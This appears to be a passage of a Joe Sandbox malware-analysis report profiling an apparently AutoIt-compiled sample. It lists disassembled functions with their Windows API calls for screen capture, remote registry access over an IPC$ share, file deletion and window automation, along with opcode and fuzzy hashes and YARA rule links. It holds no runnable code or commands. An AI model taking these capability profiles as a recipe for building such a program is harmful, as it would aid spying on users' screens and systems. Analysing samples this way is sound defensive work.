                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2347767575-0
                                                                                                                                        • Opcode ID: e4174de9662ea4566de0262d958e7d5116ae692cda24285384ac3ee28dab1673
                                                                                                                                        • Instruction ID: d3050909dd6332cee992bf19d89f662e809e407c2c32a18b6423ebe9d87ffeb3
                                                                                                                                        • Opcode Fuzzy Hash: e4174de9662ea4566de0262d958e7d5116ae692cda24285384ac3ee28dab1673
                                                                                                                                        • Instruction Fuzzy Hash: 11516C71900249FFDF109FA4ED85EEEBB79FF48314F04815AE915AA290DB399A05CB60
                                                                                                                                        Function 007BA268 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetDC.USER32(00000000), ref: 007BA2DD
                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 007BA2E9
                                                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 007BA2F5
                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 007BA302
                                                                                                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 007BA356
                                                                                                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 007BA392
                                                                                                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 007BA3B6
                                                                                                                                        • SelectObject.GDI32(00000006,?), ref: 007BA3BE
                                                                                                                                        • DeleteObject.GDI32(?), ref: 007BA3C7
                                                                                                                                        • DeleteDC.GDI32(00000006), ref: 007BA3CE
                                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 007BA3D9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                        • String ID: (
                                                                                                                                        • API String ID: 2598888154-3887548279
                                                                                                                                        • Opcode ID: 63aaac35047d9ab95251ae008b793d55fb2b5a7599ab4168d604d9e3cadcb372
                                                                                                                                        • Instruction ID: b32e7e49c8fe171320b4dfb7e0ef29e40fea70622ed6a31c3c707e1379dc119d
                                                                                                                                        • Opcode Fuzzy Hash: 63aaac35047d9ab95251ae008b793d55fb2b5a7599ab4168d604d9e3cadcb372
                                                                                                                                        • Instruction Fuzzy Hash: F1513875900349EFDB25DFA8C888EAEBBB9EF48310F14841DF95A9B210C739AD418B54
                                                                                                                                        Function 007AD520 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 144COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadStringW.USER32(00000066,?,00000FFF), ref: 007AD567
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                        • LoadStringW.USER32(?,?,00000FFF,?), ref: 007AD589
                                                                                                                                        • __swprintf.LIBCMT ref: 007AD5DC
                                                                                                                                        • _wprintf.LIBCMT ref: 007AD68D
                                                                                                                                        • _wprintf.LIBCMT ref: 007AD6AB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                        • API String ID: 2116804098-2391861430
                                                                                                                                        • Opcode ID: 07a17175220284ba5cef9e4a3bc77596bc3250a52f1d31c9b4bfbb9874b177ef
                                                                                                                                        • Instruction ID: de6af5ba0a23b607cf9cb3dff512dc88b1523766f97d961cd72dcbafb49dc1bd
                                                                                                                                        • Opcode Fuzzy Hash: 07a17175220284ba5cef9e4a3bc77596bc3250a52f1d31c9b4bfbb9874b177ef
                                                                                                                                        • Instruction Fuzzy Hash: AD51B371900209FACF25FBA0CD4AEEEB779AF54304F104265F506B2161EA396F58DFA0
                                                                                                                                        Function 007AD338 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 140COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 007AD37F
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007AD3A0
                                                                                                                                        • __swprintf.LIBCMT ref: 007AD3F3
                                                                                                                                        • _wprintf.LIBCMT ref: 007AD499
                                                                                                                                        • _wprintf.LIBCMT ref: 007AD4B7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                        • API String ID: 2116804098-3420473620
                                                                                                                                        • Opcode ID: 7b820f0a170e9ccfde3865851d3c4d3723543a471f90aeb0a0f786586089fa54
                                                                                                                                        • Instruction ID: 583f3c5cfd084c2c164798d7d372d754b7f16f44a2adf6e55015a87564e75378
                                                                                                                                        • Opcode Fuzzy Hash: 7b820f0a170e9ccfde3865851d3c4d3723543a471f90aeb0a0f786586089fa54
                                                                                                                                        • Instruction Fuzzy Hash: A451A471900209FACF25FBE0DD4ADEEB779AF18700F108265B506B2161EA796F58DF60
                                                                                                                                        Function 0079AEE5 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00767E53: _memmove.LIBCMT ref: 00767EB9
                                                                                                                                        • _memset.LIBCMT ref: 0079AF74
                                                                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0079AFA9
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0079AFC5
                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0079AFE1
                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0079B00B
                                                                                                                                        • CLSIDFromString.COMBASE(?,?), ref: 0079B033
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0079B03E
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0079B043
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                        • API String ID: 1411258926-22481851
                                                                                                                                        • Opcode ID: 8f434e224b0e15b000782232244b9439f95799df228bd6d8f225157a466c76c4
                                                                                                                                        • Instruction ID: 944d3a4080ff2162fca8e351d3b7ef3ea55c4057007d4ce50dd629a36de790e4
                                                                                                                                        • Opcode Fuzzy Hash: 8f434e224b0e15b000782232244b9439f95799df228bd6d8f225157a466c76c4
                                                                                                                                        • Instruction Fuzzy Hash: AC412C75C1122DEACF21EBA4DC85CEEB778FF08704F004129E812A2151EB799E04CF90
                                                                                                                                        Function 007C3AF7 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,007C2AA6,?,?), ref: 007C3B0E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharUpper
                                                                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                        • API String ID: 3964851224-909552448
                                                                                                                                        • Opcode ID: cb048d7ccbf51261494fc6bbca8027dd2cb33928829ac7537ae7ee75490af490
                                                                                                                                        • Instruction ID: f0b0aa1e063c89d689b5beffc0f6acf1e2a991fa0d9e7877198639dad4071ea7
                                                                                                                                        • Opcode Fuzzy Hash: cb048d7ccbf51261494fc6bbca8027dd2cb33928829ac7537ae7ee75490af490
                                                                                                                                        • Instruction Fuzzy Hash: E841797415024ACBDF14EF44D944BEE3366BF25380F14882CEC66AB295DB389E5ACB61
                                                                                                                                        Function 007A83D6 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00767E53: _memmove.LIBCMT ref: 00767EB9
                                                                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 007A843F
                                                                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 007A8455
                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007A8466
                                                                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 007A8478
                                                                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 007A8489
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: SendString$_memmove
                                                                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                        • API String ID: 2279737902-1007645807
                                                                                                                                        • Opcode ID: ee55f869c0a03aa3951fb1ce65aea805e5e69ead7cdb9a71afbe53a274a83447
                                                                                                                                        • Instruction ID: 9ff802fd664fd23755619b95ac27a2ff7e0be3bbdc6566f39d92260edd84de7d
                                                                                                                                        • Opcode Fuzzy Hash: ee55f869c0a03aa3951fb1ce65aea805e5e69ead7cdb9a71afbe53a274a83447
                                                                                                                                        • Instruction Fuzzy Hash: 3411B261A40299B9D720A7A1CC4ADFF7A7CFFD6B00F4009297822E21C0DEB85E85C5B1
                                                                                                                                        Function 007A8097 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • timeGetTime.WINMM ref: 007A809C
                                                                                                                                          • Part of subcall function 0077E3A5: timeGetTime.WINMM(?,75A8B400,007D6163), ref: 0077E3A9
                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 007A80C8
                                                                                                                                        • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 007A80EC
                                                                                                                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 007A810E
                                                                                                                                        • SetActiveWindow.USER32 ref: 007A812D
                                                                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 007A813B
                                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 007A815A
                                                                                                                                        • Sleep.KERNEL32(000000FA), ref: 007A8165
                                                                                                                                        • IsWindow.USER32 ref: 007A8171
                                                                                                                                        • EndDialog.USER32(00000000), ref: 007A8182
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                        • String ID: BUTTON
                                                                                                                                        • API String ID: 1194449130-3405671355
                                                                                                                                        • Opcode ID: 8e35706bd013c99d149e721338b0c521a27740ccc0caad664ce2a9638e30beb8
                                                                                                                                        • Instruction ID: 4edc717a2871dfac60cdc34c19d3613ec07a968612efd6bfe8497e8d30ed4e3a
                                                                                                                                        • Opcode Fuzzy Hash: 8e35706bd013c99d149e721338b0c521a27740ccc0caad664ce2a9638e30beb8
                                                                                                                                        • Instruction Fuzzy Hash: 6221CC70200248BFD7316B61DCD9B263B2AF7AA389F448259F41186161CF7E5D56871A
                                                                                                                                        Function 007A32B0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 72windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,007D3C64,00000010,00000000,Bad directive syntax error,007FDBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 007A32D1
                                                                                                                                        • LoadStringW.USER32(00000000,?,007D3C64,00000010), ref: 007A32D8
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                        • _wprintf.LIBCMT ref: 007A3309
                                                                                                                                        • __swprintf.LIBCMT ref: 007A332B
                                                                                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 007A3395
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                        • API String ID: 1506413516-4153970271
                                                                                                                                        • Opcode ID: b251bf0b75e7785b44beaaa9f6914ebce69534601b4452789beb43572a53df07
                                                                                                                                        • Instruction ID: b9ab67968bc2b6eb08c41cd6e83f684b2d26627a7cb4cc777debb55be298fb17
                                                                                                                                        • Opcode Fuzzy Hash: b251bf0b75e7785b44beaaa9f6914ebce69534601b4452789beb43572a53df07
                                                                                                                                        • Instruction Fuzzy Hash: 55219F3184421EFBCF15AFD0CC0AEEE7739FF18701F004455B926A50A2DA79AB54DB60
                                                                                                                                        Function 007AC890 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007AC6A0: __time64.LIBCMT ref: 007AC6AA
                                                                                                                                          • Part of subcall function 007641A7: _fseek.LIBCMT ref: 007641BF
                                                                                                                                        • __wsplitpath.LIBCMT ref: 007AC96F
                                                                                                                                          • Part of subcall function 0078297D: __wsplitpath_helper.LIBCMT ref: 007829BD
                                                                                                                                        • _wcscpy.LIBCMT ref: 007AC982
                                                                                                                                        • _wcscat.LIBCMT ref: 007AC995
                                                                                                                                        • __wsplitpath.LIBCMT ref: 007AC9BA
                                                                                                                                        • _wcscat.LIBCMT ref: 007AC9D0
                                                                                                                                        • _wcscat.LIBCMT ref: 007AC9E3
                                                                                                                                          • Part of subcall function 007AC6E4: _memmove.LIBCMT ref: 007AC71D
                                                                                                                                          • Part of subcall function 007AC6E4: _memmove.LIBCMT ref: 007AC72C
                                                                                                                                        • _wcscmp.LIBCMT ref: 007AC92A
                                                                                                                                          • Part of subcall function 007ACE59: _wcscmp.LIBCMT ref: 007ACF49
                                                                                                                                          • Part of subcall function 007ACE59: _wcscmp.LIBCMT ref: 007ACF5C
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007ACB8D
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007ACC24
                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007ACC3A
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007ACC4B
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007ACC5D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 152968663-0
                                                                                                                                        • Opcode ID: 6f97787f185f84618ce91c482a977227641d2192bec8bed56a23cbb7e6f8f427
                                                                                                                                        • Instruction ID: 78300803b695296e8b7e776873fcaefa455a44a10365284d67a9c8f0c4d4955e
                                                                                                                                        • Opcode Fuzzy Hash: 6f97787f185f84618ce91c482a977227641d2192bec8bed56a23cbb7e6f8f427
                                                                                                                                        • Instruction Fuzzy Hash: 28C14BB190011DAECF11DFA5CC85EEEB7BDAF89310F0041AAF609E6151DB789A84CF65
                                                                                                                                        Function 007B08D9 Relevance: 18.2, APIs: 12, Instructions: 196COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3566271842-0
                                                                                                                                        • Opcode ID: fd969205a62319aa83d85460a53433e5b8e142169871261bd9d2fb0af632942c
                                                                                                                                        • Instruction ID: 7418df38c588e6adf97e019ac8298fa5372802a96b2fa654464773e9daee74fd
                                                                                                                                        • Opcode Fuzzy Hash: fd969205a62319aa83d85460a53433e5b8e142169871261bd9d2fb0af632942c
